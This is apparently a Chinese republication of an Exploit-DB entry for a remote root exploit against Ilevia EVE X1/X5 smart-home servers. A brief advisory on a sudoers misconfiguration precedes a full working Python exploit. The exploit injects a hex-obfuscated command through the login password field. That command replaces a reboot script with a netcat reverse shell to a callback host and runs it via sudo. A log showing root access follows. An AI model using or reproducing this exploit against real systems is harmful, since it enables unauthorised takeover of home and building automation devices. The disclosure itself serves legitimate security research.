Ilevia EVE X1/X5 Server 4.7.18.0.eden - 反向Rootshell - 硬件远程漏洞利用

漏洞信息

EDB-ID: 52437
CVE: N/A
作者: LiquidWorm
类型: 远程漏洞
平台: 硬件
日期: 2025-09-16

漏洞描述

Ilevia EVE是一款智能家居和楼宇自动化解决方案，适用于住宅和商业环境。EVE X1服务器是专为高级楼宇自动化需求设计的专用硬件解决方案。

漏洞摘要: sudoers文件中的错误配置允许通过sudo无密码执行特定的Bash shell脚本，暴露了严重的权限提升漏洞。当这些脚本可由面向Web的用户(www-data)写入或通过命令注入向量访问时，攻击者可以用恶意负载覆盖或替换它们。使用sudo执行时，这些脚本将以提升的权限运行，允许攻击者远程获得完整的root访问权限。

技术细节

受影响版本: <= 4.7.18.0.eden (逻辑版本: 6.00)
测试环境:

GNU/Linux 5.4.35 (armv7l)
GNU/Linux 4.19.97 (armv7l)
Armbian 20.02.1 Buster
Apache/2.4.38 (Debian)
PHP Version 7.3.14

漏洞利用代码

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165


#!/usr/bin/env python
#
# Ilevia EVE X1/X5 Server 4.7.18.0.eden反向Rootshell
#

import telnetlib
import threading
import requests
import socket
import time
import sys

def init_quantum(target_data):
    if "http://" not in target_data and "https://" not in target_data:
        target_data = "http://" + target_data
    if ":" not in target_data.split("//")[1]:
        target_data = target_data.rstrip("/") + ":80"
    return target_data.rstrip("/")

def spark_neuroport(cyber_gate):
    def neuro_core():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(("0.0.0.0", cyber_gate))
            s.listen(1)
            print(f"[+] Cyber-link active on 0.0.0.0:{cyber_gate}...")
            conn, addr = s.accept()
            print(f"[+] Pulse from {addr[0]}:{addr[1]}")
            holo_term = telnetlib.Telnet()
            holo_term.sock = conn

            print("[*] Probing matrix with 'pwd' signal...")
            conn.sendall(b"pwd\n")
            time.sleep(0.5)
            try:
                data_stream = conn.recv(4096).decode(errors='ignore')
                data_nodes = data_stream.splitlines()
                if data_nodes and data_nodes[0].strip() == "pwd":
                    data_nodes.pop(0)
                output = "\n".join(data_nodes).strip()
                print("[+] Verifistring:", output)
                if 'ilevia/www-config' in output:
                    print("[*] Synaptic intrusion confirmed, escalating to holo-shell...")
                    conn.sendall(b"script /dev/null -c /bin/sh\n")
                    time.sleep(0.5)
                    try:
                        _ = conn.recv(4096)
                    except:
                        pass
                else:
                    print("[!] Expected neural path not detected. Holo-shell may be unstable.")
            except Exception as e:
                print(f"[!] Error in synaptic probe: {e}")

            import select

            while True:
                try:
                    cmd = input("# ").strip()
                    if cmd == "exit":
                        conn.sendall(b"\x72\x6d\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f"
                                     b"\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f"
                                     b"\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74"
                                     b"\x3b\x6d\x76\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61"
                                     b"\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70"
                                     b"\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f"
                                     b"\x74\x2e\x6f\x6c\x64\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76"
                                     b"\x69\x61\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74"
                                     b"\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62"
                                     b"\x6f\x6f\x74\x0a")
                        print("[+] ilevia_reboot restored.")
                        break
                    if not cmd:
                        continue
                    conn.sendall((cmd + "\n").encode())
                    response = b""
                    conn.setblocking(0)
                    end_time = time.time() + 0.5
                    while time.time() < end_time:
                        ready = select.select([conn], [], [], 0.1)
                        if ready[0]:
                            try:
                                chunk = conn.recv(8160)
                                if not chunk:
                                    break
                                response += chunk
                            except:
                                break
                        else:
                            time.sleep(0.1)
                    conn.setblocking(1)
                    data_stream = response.decode(errors='ignore')
                    data_nodes = data_stream.splitlines()
                    clean_output = []
                    for line in data_nodes:
                        if line.strip() == cmd:
                            continue
                        if line.strip() in ["$", "#"]:
                            continue
                        clean_output.append(line)
                    if clean_output:
                        print("\n".join(clean_output).strip())
                except Exception:
                    print("[!] Neural link terminated.")
                    break
            conn.close()

    cyber_thread = threading.Thread(target=neuro_core)
    cyber_thread.start()
    return cyber_thread

def fire_photon(target_matrix, cyber_origin, cyber_gate):
    print(f"[*] Firing at {target_matrix}")
    payload = (b"\x3b\x63\x70\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61"
               b"\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70"
               b"\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f"
               b"\x74\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77"
               b"\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73"
               b"\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x2e"
               b"\x6f\x6c\x64\x3b\x65\x63\x68\x6f\x20\x22\x6d\x6b\x6e\x6f\x64\x20"
               b"\x2f\x74\x6d\x70\x2f\x70\x69\x70\x65\x20\x70\x3b\x20\x2f\x62\x69"
               b"\x6e\x2f\x73\x68\x20\x2d\x69\x20\x3c\x20\x2f\x74\x6d\x70\x2f\x70"
               b"\x69\x70\x65\x20\x7c\x20\x6e\x63\x20" +
               f"{cyber_origin}".encode() +
               b"\x20" +
               f"{cyber_gate}".encode() +
               b"\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x70\x69\x70\x65\x22\x20\x3e\x20"
               b"\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77\x77\x77"
               b"\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73\x68\x2f"
               b"\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x3b\x63\x68"
               b"\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77"
               b"\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65"
               b"\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x3b\x73\x75\x64\x6f\x20\x2f\x68\x6f\x6d\x65"
               b"\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74"
               b"\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74")
    try:
        requests.post(target_matrix, data={"userid":"inas","passwd":payload}, timeout=3)
        print("[*] Photon fired.")
    except requests.exceptions.ReadTimeout:
        pass
    except requests.exceptions.RequestException as e:
        print(f"[!] Photon failed: {e}")

def boot_sequence():
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <target_ip[:port]> <callback_ip> <callback_gate>")
        print("Example: python eve.py 1.2.3.4:8080 5.6.7.8 5555")
        sys.exit(1)

    target_data = sys.argv[1]
    cyber_origin = sys.argv[2]
    try:
        cyber_gate = int(sys.argv[3])
    except ValueError:
        print("[!] Cyber gate must be numeric.")
        sys.exit(1)

    target_matrix = init_quantum(target_data) + "/ajax/php/login.php"
    neuro_thread = spark_neuroport(cyber_gate)
    time.sleep(1)
    fire_photon(target_matrix, cyber_origin, cyber_gate)
    neuro_thread.join()

if __name__ == "__main__":
    boot_sequence()

使用示例

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


$ python rewteve.py 10.0.0.18:8080 10.0.0.4 5555
[+] Cyber-link active on 0.0.0.0:5555...
[*] Firing at http://10.0.0.18:8080/ajax/php/login.php
[+] Pulse from 10.0.0.18:46444
[*] Probing matrix with 'pwd' signal...
[+] Verifistring: /home/ilevia/www-config/http/ajax/php
[*] Synaptic intrusion confirmed, escalating to holo-shell...
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[+] ilevia_reboot restored.

漏洞发现信息

发现者: Gjoko ‘LiquidWorm’ Krstic
咨询ID: ZSL-2025-5959
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5959.php
日期: 2024年5月1日

Ilevia EVE X1/X5服务器4.7.18.0.eden反向Rootshell硬件远程漏洞利用

本文详细分析了Ilevia EVE智能家居自动化服务器中的sudoers文件错误配置漏洞，该漏洞允许攻击者通过恶意脚本获取root权限。包含完整的Python漏洞利用代码实现反向shell连接和权限提升过程。